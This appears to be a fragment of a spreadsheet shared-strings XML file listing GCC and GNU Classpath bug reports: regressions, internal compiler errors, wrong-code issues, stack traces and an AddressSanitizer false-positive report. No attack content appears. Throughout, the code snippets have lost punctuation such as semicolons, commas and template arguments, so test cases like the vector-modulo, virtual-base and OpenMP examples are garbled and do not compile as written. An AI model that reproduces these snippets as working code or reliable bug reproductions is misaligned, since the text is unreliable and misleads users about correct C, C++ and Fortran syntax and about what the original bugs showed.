    <t>GCC-79731</t>
  </si>
  <si>
    <t>[7 Regression] ICE: verify_gimple failed</t>
  </si>
  <si>
    <t>Affects version 7 at -Os -O1 or higher.
$ cat z1.c
typedef unsigned V __attribute__ ((vector_size (8)))
V
foo (unsigned x V v)
{
  do {
      v %= x
      x = 1
  } while (v[1])
  return v
}
void fn2 ()
{
  V x = foo (5 (V) { 0 1 })
  if (x[0] || x[1] || x[2] || x[3])
}
$ gcc-7-20170226 -O2 -c z1.c
z1.c: In function 'fn2':
z1.c:11:6: error: position plus size exceeds size of referenced object in BIT_FIELD_REF
 void fn2 ()
      ^~~
BIT_FIELD_REF 
z1.c:14:28: note: in statement
   if (x[0] || x[1] || x[2] || x[3])
       ~~~~~~~~~~~~~~~~~~~~~^~~~~~~
_4 = BIT_FIELD_REF 
z1.c:11:6: internal compiler error: verify_gimple failed
 void fn2 ()
      ^~~
0xc40f16 verify_gimple_in_cfg(function* bool)
        ../../gcc/tree-cfg.c:5266
0xb1a203 execute_function_todo
        ../../gcc/passes.c:1966
0xb1ab35 execute_todo
        ../../gcc/passes.c:2016</t>
  </si>
  <si>
    <t>GCC-11750</t>
  </si>
  <si>
    <t>class scope using-declaration lookup not implemented</t>
  </si>
  <si>
    <t xml:space="preserve">Paragraph 10.3/2 in the C++ standard [ISO/IEC 14882:1998] provides the following
code example:
struct A {
    virtual void f()
}
struct B : virtual A {
    virtual void f()
}
struct C : B  virtual A {
    using A::f 
}
void foo() {
    C c 
    c.f()      // calls B::f the final overrider
    c.C::f()   // calls A::f because of the using-declaration
}
When a similar program is compiled using G++ 3.3 the method call 'c.f()' in
function foo() incorrectly invokes A::f and not B::f as specified in the standard.
#include 
struct A {
    virtual void f() { std::cout &lt;&lt; A::f()\n }
}
struct B : virtual A {
    virtual void f() { std::cout &lt;&lt; B::f()\n }
}
struct C : B virtual A {
    using A::f
}
int main()
{
    C c
    c.f()      // ERROR - Incorrectly invokes A::f
    c.C::f()   // OK - Invokes A::f
}
$ g++ main.cpp
$ ldd a.out
        libstdc++.so.5 =&gt;
/usr/local/gcc/3.3/lib/gcc-lib/i686-pc-linux-gnu/3.3/libstdc++.so.5 (0x40017000)
        libm.so.6 =&gt; /lib/tls/libm.so.6 (0x400e4000)
        libgcc_s.so.1 =&gt;
/usr/local/gcc/3.3/lib/gcc-lib/i686-pc-linux-gnu/3.3/libgcc_s.so.1 (0x40106000)
        libc.so.6 =&gt; /lib/tls/libc.so.6 (0x42000000)
        /lib/ld-linux.so.2 =&gt; /lib/ld-linux.so.2 (0x40000000)
$ ./a.out
A::f()
A::f()
</t>
  </si>
  <si>
    <t>fabien</t>
  </si>
  <si>
    <t>jfischer_5809</t>
  </si>
  <si>
    <t>GCC-77947</t>
  </si>
  <si>
    <t>[7 Regression] ICE with -g and -O2 in strip_naming_typedef</t>
  </si>
  <si>
    <t>Created attachment 39788
gzipped C++ source code
The attached code when compiled by gcc trunk dated 20161012 and compiler
flags -g -O2 does this:
$ ../results/bin/gcc -c -g -O2 bug309.cc
libs/serialization/src/basic_oarchive.cpp: In member function â€˜virtual bool boost::archive::detail::basic_oarchive_impl::find(const boost::serialization::extended_type_info&amp;) const::bosarg::tracking(unsigned int) constâ€™:
libs/serialization/src/basic_oarchive.cpp:464:1: internal compiler error: Segmentation fault
0xc29117 crash_signal
	../../trunk/gcc/toplev.c:337
0x9008a8 strip_naming_typedef
	../../trunk/gcc/dwarf2out.c:5095
0x9008a8 get_context_die
	../../trunk/gcc/dwarf2out.c:23429
0x9005c7 force_decl_die
	../../trunk/gcc/dwarf2out.c:23448</t>
  </si>
  <si>
    <t>GCC-15580</t>
  </si>
  <si>
    <t>wrong code generation in c++ assignment operator</t>
  </si>
  <si>
    <t>`this' calculated incorrectly for the assignment operator of the virtual base.
Environment:
gcc 3.3.x
How-To-Repeat:
[8&lt;---test.cc---]
struct A { int a }
struct B : virtual A { }
struct C : virtual A { }
struct D : B C { }
int
main()
{
    D d
    d = d
    d.a = 5
}
[---&gt;8]
g++ test.cc
./a.out
no optimization should be used otherwise `d.a' reference will be cached
from assignment operation. in any doubt this is an optimizer error here
is a modified version of the same test.cc which will crash in any of -Oxx
switches:
[...]
void test(D d)
int
main()
{
    D d
    d = d
    test(d)
}
void test(D d)
{
}
&gt;Workaround:
downgrade to 3.2.x</t>
  </si>
  <si>
    <t>unicorn</t>
  </si>
  <si>
    <t>GCC-49221</t>
  </si>
  <si>
    <t>[4.7 Regression] Several ICEs in the obj-c++ test suite after revision 174307</t>
  </si>
  <si>
    <t>On x86_64-apple-darwin10 revision 174307 caused/exposed several ICEs in the obj-c++ test suite with both -m32 and -m64:
FAIL: obj-c++.dg/exceptions-3.mm -fgnu-runtime (internal compiler error)
FAIL: obj-c++.dg/exceptions-3.mm -fgnu-runtime (test for excess errors)
FAIL: obj-c++.dg/exceptions-4.mm -fgnu-runtime (internal compiler error)
FAIL: obj-c++.dg/exceptions-4.mm -fgnu-runtime (test for excess errors)
FAIL: obj-c++.dg/exceptions-5.mm -fgnu-runtime (internal compiler error)
FAIL: obj-c++.dg/exceptions-5.mm -fgnu-runtime (test for excess errors)
FAIL: obj-c++.dg/fobjc-exceptions-1.mm -fgnu-runtime (internal compiler error)
FAIL: obj-c++.dg/fobjc-exceptions-1.mm -fgnu-runtime (test for excess errors)
FAIL: obj-c++.dg/fobjc-exceptions-2.mm -fgnu-runtime (internal compiler error)
FAIL: obj-c++.dg/fobjc-exceptions-2.mm -fgnu-runtime (test for excess errors)
FAIL: obj-c++.dg/fobjc-exceptions-3.mm -fgnu-runtime (internal compiler error)
FAIL: obj-c++.dg/fobjc-exceptions-3.mm -fgnu-runtime (test for excess errors)
FAIL: obj-c++.dg/try-catch-13.mm -fgnu-runtime (internal compiler error)
FAIL: obj-c++.dg/try-catch-13.mm -fgnu-runtime (test for excess errors)
FAIL: obj-c++.dg/try-catch-4.mm -fgnu-runtime (internal compiler error)
FAIL: obj-c++.dg/try-catch-4.mm -fgnu-runtime (test for excess errors)
They are all of the kind
A BUNCH OF ERRORS
/opt/gcc/work/gcc/testsuite/obj-c++.dg/exceptions-3.mm:114:1: internal compiler error: in add_stmt at cp/semantics.c:396
where the assert at cp/semantics.c:396 was introduced in revision 174307.</t>
  </si>
  <si>
    <t>GCC-78392</t>
  </si>
  <si>
    <t>ICE in gfc_trans_auto_array_allocation at fortran/trans-array.c:5979</t>
  </si>
  <si>
    <t>Consider this short test case:
module mytypes
   implicit none
 contains
   pure integer function get_i ()
     get_i = 13
   end function
end module
program test
  use mytypes
  implicit none
  integer dimension(get_i()) save :: x
  print * size (x)
end
It seems to be valid Fortran but generates an ICE with every gfortran version I tried (from 4.7 to to 7-trunk).
On trunk the error looks like this:
internal compiler error: in gfc_trans_auto_array_allocation at fortran/trans-array.c:5979
0x8dff23 gfc_trans_auto_array_allocation(tree_node* gfc_symbol* gfc_wrapped_block*)
	/home/jweil/gcc/gcc7/trunk/gcc/fortran/trans-array.c:5979
0x90494d gfc_trans_deferred_vars(gfc_symbol* gfc_wrapped_block*)
	/home/jweil/gcc/gcc7/trunk/gcc/fortran/trans-decl.c:4321
0x90b66e gfc_generate_function_code(gfc_namespace*)
	/home/jweil/gcc/gcc7/trunk/gcc/fortran/trans-decl.c:6366
0x8cdcfd gfc_generate_code(gfc_namespace*)
	/home/jweil/gcc/gcc7/trunk/gcc/fortran/trans.c:2030
0x85cefd translate_all_program_units
	/home/jweil/gcc/gcc7/trunk/gcc/fortran/parse.c:6038
0x85d572 gfc_parse_file()
	/home/jweil/gcc/gcc7/trunk/gcc/fortran/parse.c:6238
0x8b66a5 gfc_be_parse_file
	/home/jweil/gcc/gcc7/trunk/gcc/fortran/f95-lang.c:202
It is related to typebound_proc_19.f90 in the testsuite (from PR 47399).</t>
  </si>
  <si>
    <t>GCC-38257</t>
  </si>
  <si>
    <t>[4.4 regression] ICE with auto and #pragma omp parallel</t>
  </si>
  <si>
    <t>The following (IMHO valid) code snippet triggers an ICE on mainline when
compiled with -fopenmp:
==========================================
template void foo()
{
#pragma omp parallel for
  for (auto i=0 i&lt;4 ++i) 
}
==========================================
bug.cc: In function 'void foo()':
bug.cc:4: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
Without the template I get the following error message:
bug.cc: In function 'void foo()':
bug.cc:4: error: declaration of 'auto i' has no initializer
bug.cc:4: error: invalid type for iteration variable 'i'
which seems to be wrong because i has an initializer.
Without -fopenmp both versions compile fine.</t>
  </si>
  <si>
    <t>GCC-29433</t>
  </si>
  <si>
    <t>using boost::MPL requires lots of memory</t>
  </si>
  <si>
    <t>Here is a code which doesn't compile. It takes all swap space (around 2GB) and all system memory(about 1GB) compiles around 15-20 minutes and then crashes with the following message : g++: Internal error: Killed (program cc1plus)</t>
  </si>
  <si>
    <t>grayyoga</t>
  </si>
  <si>
    <t>GCC-71290</t>
  </si>
  <si>
    <t>[6 Regression] Flexible array member is not diagnosed with -pedantic</t>
  </si>
  <si>
    <t>We used to warn for:
$ cat test.cc 
struct S {
    int i
    unsigned arr[]
}
$ /opt/gcc-5.3.0/bin/g++ test.cc -pedantic
test.cc:3:18: warning: ISO C++ forbids zero-size array 'arr' [-Wpedantic]
     unsigned arr[]
Starting with r231665 the warning is gone.</t>
  </si>
  <si>
    <t>GCC-66621</t>
  </si>
  <si>
    <t>[4.9/5 Regression] Mistakenly unsupported tests in g++.dg/torture/</t>
  </si>
  <si>
    <t>I've noticed that since r208416 a lot of g++.dg/torture/* tests use
{ target c++11 } which makes all of them UNSUPPORTED because g++.dg/torture/
does not cycle through c++98/c++11/c++14 options.
grep '\(vshuf.*\|pr\(40991\|47559\|49770\|51598\|53161\|53602\|55260-1\|56768\|59295\)\)\.C' g++.sum  | grep -v ^UNSUPPORTED | wc -l
0
Thus either all those tests should be changed back to use e.g. // { dg-additional-options -std=c++11 }
or g++.dg/torture/ needs to cycle through the options too.</t>
  </si>
  <si>
    <t>GCC-79897</t>
  </si>
  <si>
    <t>[7 Regression] ICE in gimplify_modify_expr at gimplify.c:5627 on ARM target</t>
  </si>
  <si>
    <t>Running on ARM target (with cross-compiler):
$ arm-linux-gnueabi-g++ /home/marxin/Programming/gcc/gcc/testsuite/g++.dg/init/enum2.C -fsanitize=undefined
In function â€˜int main()â€™:
cc1plus: internal compiler error: in gimplify_modify_expr at gimplify.c:5627
0xb01b51 gimplify_modify_expr
	.././../gcc/gimplify.c:5626
0xaef54d gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	.././../gcc/gimplify.c:11192
0xaf2cf6 gimplify_stmt(tree_node** gimple**)
	.././../gcc/gimplify.c:6478
0xaf39a1 gimplify_compound_expr
	.././../gcc/gimplify.c:5715
0xaef4fd gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	.././../gcc/gimplify.c:11181
0xb10435 force_gimple_operand_1(tree_node* gimple** bool (*)(tree_node*) tree_node*)
	.././../gcc/gimplify-me.c:78
0xb1056f force_gimple_operand_gsi_1(gimple_stmt_iterator* tree_node* bool (*)(tree_node*) tree_node* bool gsi_iterator_update)
	.././../gcc/gimplify-me.c:115
0xd9016c instrument_bool_enum_load
	.././../gcc/ubsan.c:1462
0xd9016c execute
	.././../gcc/ubsan.c:2003</t>
  </si>
  <si>
    <t>GCC-5053</t>
  </si>
  <si>
    <t>[parser] g++ 2.95.3 cannot call non-static template members from template functions.</t>
  </si>
  <si>
    <t>g++ 2.95.3 fails to compile the attached code displaying the error message
main.cpp: In function `void fooWrapper()':
main.cpp:14: parse error before `&gt;'
Release:
2.95.3
Environment:
AMD Duron SuSE Linux 7.3 Professional Kernel 2.4.10-4GB libc 2.2.4 binutils 2.11.90
How-To-Repeat:
Compile the attached sourcecode via 'g++ -o main main.cpp'.</t>
  </si>
  <si>
    <t>raabe</t>
  </si>
  <si>
    <t>GCC-61717</t>
  </si>
  <si>
    <t>seg fault on using variadic templates to initialize array</t>
  </si>
  <si>
    <t>Created attachment 33071
preprocessed source
segmentation fault on using variadic templates to initialize array
gcc command line :
g++ -std=c++11 -Wall -fexceptions -g  -c main.cpp -o main.o
gcc output :
In file included from main.cpp:2:0:
garbage_collector.h:321:87: internal compiler error: Segmentation fault
 successive_range ptrArray)&gt; GCPtrArray::objectOffsetArray
                                                                                       ^</t>
  </si>
  <si>
    <t>programmerjake</t>
  </si>
  <si>
    <t>CLASSPATH-22163</t>
  </si>
  <si>
    <t>scrollbars appear and disappear</t>
  </si>
  <si>
    <t>I can see this with this chess game:
./gcjappletviewer http://www.chessgames.com/perl/chessgame?gid=1044316
Advance to white's first move so that there is text in the area
below the board.  Now move your mouse slowly off the bottom edge
(or right edge) of the text area.  You'll see a scrollbar appear
briefly and then disappear.</t>
  </si>
  <si>
    <t>GCC-45908</t>
  </si>
  <si>
    <t>[C++0x] ICE involving decltype: in tree_low_cst at tree.h:4114</t>
  </si>
  <si>
    <t>Created attachment 21968
failing file
g++-4.6.0-alpha20100925 -std=c++0x -c test.cc
test.cc:7:50: internal compiler error: in tree_low_cst at tree.h:4114
also:
g++-4.6.0-alpha20100925 -std=c++0x -c test2.cc
test.cc:6:33: error: 'statements' was not declared in this scope
test.cc:6:33: error: 'statements' was not declared in this scope</t>
  </si>
  <si>
    <t>tom.prince</t>
  </si>
  <si>
    <t>GCC-40155</t>
  </si>
  <si>
    <t>[c++0x] variadic template pack problem</t>
  </si>
  <si>
    <t>I'm fairly sure this should compile but it doesn't:
---------------------
template  struct identity
{  typedef T type  }
template 
int forward_call(RT (*) (A...) typename identity::type...)
int g (double)
int i = forward_call(
-------------------------------------
The problem is the expansion
  typename identity::type...
which should wrap identity::type around each element An of the
template pack A. I'm not entirely familiar with all the rules for
template packs yet but I think that this should work taking
the examples in
  http://www.jot.fm/issues/issue_2008_02/article2/
into account.
Best
 W.</t>
  </si>
  <si>
    <t>GCC-36784</t>
  </si>
  <si>
    <t>[4.3 Regression] g++ internal compiler error: in remove_insn at emit-rtl.c:3601</t>
  </si>
  <si>
    <t>gcc-4.3.0 fail to compile cloudy-07.02.01 with this message.
It may be fixed by  
http://gcc.gnu.org/ml/gcc-patches/2008-03/msg01245.html
.
g++ -fPIC -DPIC -O2 -g -mieee   -c -o atmdat_readin.o atmdat_readin.cpp
atmdat_readin.cpp: In function 'void atmdat_readin()':
atmdat_readin.cpp:1746: internal compiler error: in remove_insn at emit-rtl.c:3601
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc4kyLGA.out file please attach this to your bugreport.
make: *** [atmdat_readin.o] Error 1
# /usr/bin/gcc -v
Using built-in specs.
Target: sh4-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla
--enable-bootstrap --enable-shared --enable-threads=posix
--enable-checking=release --with-system-zlib --enable-__cxa_atexit
--disable-libunwind-exceptions
--enable-languages=cc++objcobj-c++javafortran --enable-java-awt=gtk
--disable-dssi --enable-plugin
--with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre
--enable-libgcj-multifile --enable-java-maintainer-mode
--with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib
--build=sh4-redhat-linux
Thread model: posix
gcc version 4.3.0 20080404 (Red Hat 4.3.0-6.fs1.1) (GCC)</t>
  </si>
  <si>
    <t>masaki.chikama</t>
  </si>
  <si>
    <t>GCC-7124</t>
  </si>
  <si>
    <t>-O2 -march=athlon produces ICE</t>
  </si>
  <si>
    <t>optimization flags -O2 -march=athlon produce an ICE.
clacrt.c: In function `clacrt_':
clacrt.c:136: error: unable to find a register to spill in class `FLOAT_REGS'
clacrt.c:136: error: this is the insn:
(insn:HI 109 108 112 9 0x401a6100 (set (subreg:SF (reg/v:DI 30 rmm1 [71]) 0)
        (minus:SF (reg:SF 12 st(4) [94])
            (reg:SF 8 st(0) [97]))) 556 {*fop_sf_1_nosse} (insn_list 107 (insn_list 104 (nil)))
    (expr_list:REG_DEAD (reg:SF 8 st(0) [97])
        (expr_list:REG_DEAD (reg:SF 12 st(4) [94])
            (nil))))
clacrt.c:136: internal compiler error: Internal compiler error in spill_failure at reload1.c:1908
Release:
gcc version 3.2 20020625 (experimental)
Environment:
RedHat Linux 7.1 / Athlon 1.3GHz
How-To-Repeat:
gcc -c -O2 -march=athlon clacrt.i 
ICE does NOT happen for
gcc -c -O2 clacrt.i</t>
  </si>
  <si>
    <t>perrin</t>
  </si>
  <si>
    <t>GCC-2970</t>
  </si>
  <si>
    <t>complex inserter with extraneous 'ends'</t>
  </si>
  <si>
    <t>In the implementation of operator there appears to be an extraneous 'ends'.
In line 86 of complex_io.cc is this line:
__s &lt;&lt; '(' &lt;&lt; __x.real() &lt;&lt;  &lt;&lt; __x.imag() &lt;&lt; ')' &lt;&lt; ends
This will actually write (xy)\0 to the stringbuffer then the same to the output stream.  This bug was most likely being hidden by bug #2830.
Also note that this 'ends' does not appear in the Standard (or at least the last public draft) in 26.2.6.
Release:
cvs gcc 5-26-2001
Environment:
Looking at source code...
How-To-Repeat:
Observe line 86 of complex_io.cc</t>
  </si>
  <si>
    <t>theonetruekenny</t>
  </si>
  <si>
    <t>GCC-40157</t>
  </si>
  <si>
    <t>ICE with -floop-block</t>
  </si>
  <si>
    <t>Hi
With this simple testcase:
int buffer[256*256]
int main(void)
{
    int *dest = buffer
    int x y
    for(x = 0 x &lt; 256 x++)
        for(y = 0 y &lt; 256 y++)
            *dest++ = 0
    return 0
}
We get an ICE:
% gcc-4.4 -O1 -floop-block foo.c -o foo
foo.c: In function â€˜mainâ€™:
foo.c:2: internal compiler error: in expand_scalar_variables_expr at graphite.c:4295
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Thanks.</t>
  </si>
  <si>
    <t>arthur.loiret</t>
  </si>
  <si>
    <t>GCC-36672</t>
  </si>
  <si>
    <t>IRA + -fno-pic ICE in emit_swap_insn at reg-stack.c:829</t>
  </si>
  <si>
    <t>&gt; gcc -v
Using built-in specs.
Target: i386-apple-darwin9.3.0
Configured with: ../gcc/configure --prefix=/usr/local/gcc44-ira
--enable-threads=posix --with-arch=core2 --with-tune=core2 --with-gmp=/sw
--with-mpfr=/sw --disable-nls --disable-bootstrap --enable-checking=yesrtl
CFLAGS=-g LDFLAGS=/usr/lib/libiconv.dylib --enable-languages=cc++objc
Thread model: posix
gcc version 4.4.0 20080530 (experimental) (GCC)
&gt; gcc -O3 -fira -fno-pic -S ira-ice2.i
ira-ice2.i:38: internal compiler error: in emit_swap_insn at reg-stack.c:829
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Happens with -O2 but not below that and not without -fno-pic.</t>
  </si>
  <si>
    <t>astrange</t>
  </si>
  <si>
    <t>GCC-59860</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE in compute_may_aliases at tree-ssa-structalias.c:6843</t>
  </si>
  <si>
    <t>The following testcase ICEs at -O1
extern __inline __attribute__ ((__always_inline__)) __attribute__ ((__gnu_inline__)) __attribute__ ((__artificial__)) char * __attribute__ ((__nothrow__  __leaf__)) 
strcat (char *__restrict __dest const char *__restrict __src)
{
  return __builtin___strcat_chk (__dest __src __builtin_object_size (__dest 2 &gt; 1))
}
static char raw_decode
void foo (char **argv char *outfilename)
{
  if (**argv == 'r')
    raw_decode = 1
  strcat (outfilename raw_decode ? .raw : .wav)
}</t>
  </si>
  <si>
    <t>GCC-40892</t>
  </si>
  <si>
    <t>maybe_warn_cpp0x i18n problems</t>
  </si>
  <si>
    <t>cp/error.c:maybe_warn_cpp0x takes a string that is an English language
fragment and inserts it into a sentence for a diagnostic the string in
question is neither translated nor extracted for gcc.pot.  Whole sentences
should be used for diagnostics either pass an enum to this function
rather than an English fragment and have a switch statement with appropriate
pedwarn calls or pass the complete diagnostic text to this function and
name the parameter appropriately so that the string is extracted for
translation.</t>
  </si>
  <si>
    <t>CLASSPATH-33792</t>
  </si>
  <si>
    <t>Problem configuring Classpath with Sun JDK</t>
  </si>
  <si>
    <t>With Classpath 0.96 when running the configure script in the Classpath root directory with certain JDKs (in my case Sun's JDK 1.6 in OpenSuSE 10.3) the configure script will try to build a test which will start the compilation of Classpath sources in java.*. The test is run using javac and consequently results in an out of memory error (OOM). The configure script will then fall back on compiling with ecj as it believes javac is neither 1.5 compliant or can handle the -J argument.</t>
  </si>
  <si>
    <t>ian.rogers</t>
  </si>
  <si>
    <t>GCC-10956</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE when specializing a template member function of a template class in tsubst at cp/pt.c:6459</t>
  </si>
  <si>
    <t>This code fragment is related to the one in [Bug c++/10940] but since that one 
generated bad code and this one actually stops with an internal compiler error 
I am submitting it as a new bug.  It may also be related to [Bug c++/6949] 
although the workaround there of providing a non-empty function declaration 
does not work in this example.
---------------------------------------------------------------
template
class C
{
public:
	template T pre_add(T* p T v)
}
template
template
inline T C::pre_add(T* p T v)
{
	T pre = *p
	*p += v
	return pre
}
template 
inline T pre_add(T* p T v)
{
	C c
	return c.pre_add(p v)
}
int main()
{
	int a = 0x1000
	return pre_add(
}
---------------------------------------------------------------
Environment:
cygwin on Windows XP
Release:
gcc version 3.2 20020927 (prerelease)</t>
  </si>
  <si>
    <t>lakers</t>
  </si>
  <si>
    <t>GCC-71647</t>
  </si>
  <si>
    <t>aligned(x:32) in #pragma omp simd does not work</t>
  </si>
  <si>
    <t>Created attachment 38759
The source file to reproduce the problem.
I use gcc (GCC) 6.1.1 20160623. The command line is:
gcc -O3 -S -mavx -fopt-info-vec-optimized  -fopenmp-simd  test1a.c 
When I use #pragma omp simd aligned(ab:32) in the source file (see attachment) the compiler reports:
test1a.c:9:8: note: loop vectorized
test1a.c:9:8: note: loop peeled for vectorization to enhance alignment
But when I use #pragma omp simd aligned(ab:4*sizeof(double))
the alignment is taken into account and the compiler output is:
test1a.c:9:8: note: loop vectorized
gcc 5.3.1 works ok in both cases.</t>
  </si>
  <si>
    <t>niva</t>
  </si>
  <si>
    <t>GCC-56082</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/bind_c_bool_1.f90  -O   (test for errors line 18) on powerpc-apple-darwin9 with -m32</t>
  </si>
  <si>
    <t>The test gfortran.dg/bind_c_bool_1.f90 fails on powerpc-apple-darwin9 with -m32 (but not with -m64). From 
http://gcc.gnu.org/onlinedocs/gcc/Darwin-Options.html#Darwin-Options
-mone-byte-bool
Override the defaults for `bool' so that `sizeof(bool)==1'. By default `sizeof(bool)' is `4' when compiling for Darwin/PowerPC and `1' when compiling for Darwin/x86 so this option has no effect on x86.
As shown by the following test
[karma] f90/bug% cat c_bool.f90
use iso_c_binding print * C_Bool end
[karma] f90/bug% gfc c_bool.f90
[karma] f90/bug% a.out 
           4
[karma] f90/bug% gfc c_bool.f90 -m64
[karma] f90/bug% a.out
           1
[karma] f90/bug% 
C_Bool is 4 for Darwin/PowerPC (32 bit mode) and the test
! { dg-do compile }
subroutine sub(x) bind(C) ! { dg-error GNU Extension: LOGICAL dummy argument 'x' at .1. with non-C_Bool kind in BIND.C. procedure 'sub' }
  logical(kind=4) :: x
end subroutine sub
does not give any error even with -std=f2003.
I can think of at least 3 ways to fix the test:
(a) XFAIL the test.
--- /opt/gcc/_gcc_clean/gcc/testsuite/gfortran.dg/bind_c_bool_1.f90	2013-01-13 07:07:14.000000000 +0100
+++ /opt/gcc/work/gcc/testsuite/gfortran.dg/bind_c_bool_1_a.f90	2013-01-23 14:44:33.000000000 +0100
@@ -167 +167 @@ end function sub4
 subroutine sub(x) bind(C) ! { dg-error GNU Extension: LOGICAL dummy argument 'x' at .1. with non-C_Bool kind in BIND.C. procedure 'sub' }
-  logical(kind=4) :: x
+  logical(kind=2) :: x
 end subroutine sub
 subroutine sub3(y) bind(C)
(b) Use logical(kind=2) hoping that there is no targer with C_Bool==2.
--- /opt/gcc/_gcc_clean/gcc/testsuite/gfortran.dg/bind_c_bool_1.f90	2013-01-13 07:07:14.000000000 +0100
+++ /opt/gcc/work/gcc/testsuite/gfortran.dg/bind_c_bool_1_b.f90	2013-01-23 14:52:45.000000000 +0100
@@ -157 +157 @@ function sub4() bind(C) result(res) ! { 
 end function sub4
-subroutine sub(x) bind(C) ! { dg-error GNU Extension: LOGICAL dummy argument 'x' at .1. with non-C_Bool kind in BIND.C. procedure 'sub' }
+subroutine sub(x) bind(C) ! { dg-error GNU Extension: LOGICAL dummy argument 'x' at .1. with non-C_Bool kind in BIND.C. procedure 'sub'  { xfail { powerpc*-apple-darwin* &amp;&amp; { ! lp64 } } } }
   logical(kind=4) :: x
 end subroutine sub
(c) Use the following patch
--- /opt/gcc/_gcc_clean/gcc/testsuite/gfortran.dg/bind_c_bool_1.f90	2013-01-13 07:07:14.000000000 +0100
+++ /opt/gcc/work/gcc/testsuite/gfortran.dg/bind_c_bool_1.f90	2013-01-21 19:50:29.000000000 +0100
@@ -15 +16 @@
 ! { dg-do compile }
 ! { dg-options -std=f2003 }
+! { dg-additional-options -mone-byte-bool { target { powerpc*-apple-darwin* &amp;&amp; { ! lp64 } } } }
 !
 ! PR fortran/55758
 !
What is the best one? or is there a better one?</t>
  </si>
  <si>
    <t>GCC-28879</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE with VLA in template function</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 3.4.0:
==========================
struct A
{
  int i
}
template void foo()
{
  int x[A().i]
}
==========================
bug.cc: In function 'void foo()':
bug.cc:8: internal compiler error: in value_dependent_expression_p at cp/pt.c:12761
Please submit a full bug report [etc.]
The following similar code snippet triggers an ICE since GCC 4.0.0:
==========================
struct A
{
  static int i
}
template void foo()
{
  int x[A::i]
}
==========================
bug.cc: In function 'void foo()':
bug.cc:8: internal compiler error: tree check: did not expect class 'type' have 'type' (record_type) in contains_placeholder_p at tree.c:2190
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-26269</t>
  </si>
  <si>
    <t>[4.1 regression] Declaring a variable too late yields bogus error message</t>
  </si>
  <si>
    <t>Compiling the invalid code snippet
==================
void foo()
{
    i
    int i
}
==================
yields the following error message (since GCC 3.4.5):
bug.cc: In function 'void foo()':
bug.cc:3: error: 'i' was not declared in this scope
bug.cc:4: error: redeclaration of 'int i'
bug.cc:3: error: 'i' previously declared here
The error about the redeclaraion is bogus here.
It is issued because we created a dummy declaration of 'i' to
suppress further error messages about 'i' being not declared.
Since the dummy declaration contains an error_mark_node as TREE_TYPE
(which btw. causes the  part) we should be able to
detect this case and skip issuing the redeclaration error message.
In fact we do attempt something like this in duplicate_decls:
  /* If either the type of the new decl or the type of the old decl is an
     error_mark_node then that implies that we have already issued an
     error (earlier) for some bogus type specification and in that case
     it is rather pointless to harass the user with yet more error message
     about the same declaration so just pretend the types match here.  */
  if (TREE_TYPE (newdecl) == error_mark_node
      || TREE_TYPE (olddecl) == error_mark_node)
    types_match = 1
We indeed have TREE_TYPE (olddecl) == error_mark_node in the testcase
above but apparently just setting types_match = 1 is not enough.
Is it possible to get rid of olddecl altogether and replace it with
newdecl?</t>
  </si>
  <si>
    <t>GCC-61422</t>
  </si>
  <si>
    <t>False Asan positive in libopus</t>
  </si>
  <si>
    <t>Bug is reproducible on simple test like:
//Issue was taken from libopus ffmpeg library
#define NLSF_QUANT_DEL_DEC_STATES   4
#define MAX_LPC_ORDER               16
int main()
{
    int  ind_min_max = 1 ind_max_min = 3
    char ind[ NLSF_QUANT_DEL_DEC_STATES ][ MAX_LPC_ORDER ]
    __asm (\n
             : =m(ind_min_max) =m(ind_max_min))
    memcpy( ind[ ind_max_min ] ind[ ind_min_max ] MAX_LPC_ORDER * sizeof( char ) )
    return 0
}
Output will be:
==20809==ERROR: AddressSanitizer: unknown-crash on address 0x7fff92804b00 at pc 0x4f934d bp 0x7fff92804a20 sp 0x7fff92804a00
WRITE of size 16 at 0x7fff92804b00 thread T0
    #0 0x4f934c in main (/home/mzakirov/proj/found_bugs/asan_bug/res.out+0x4f934c)
    #1 0x7f32dd7d776c in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2176c)
    #2 0x40c308 (/home/mzakirov/proj/found_bugs/asan_bug/res.out+0x40c308)
Address 0x7fff92804b00 is located in stack of thread T0 at offset 208 in frame
    #0 0x4f921b in main (/home/mzakirov/proj/found_bugs/asan_bug/res.out+0x4f921b)
  This frame has 3 object(s):
    [32 36) 'ind_min_max'
    [96 100) 'ind_max_min'
    [160 224) 'ind' &lt;== Memory access at offset 208 is inside this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: unknown-crash ??:0 main
Shadow bytes around the buggy address:
  0x1000724f8910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000724f8920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000724f8930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000724f8940: 00 00 00 00 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2
  0x1000724f8950: f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00
=&gt;0x1000724f8960:[00]00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
  0x1000724f8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000724f8980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000724f8990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000724f89a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000724f89b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
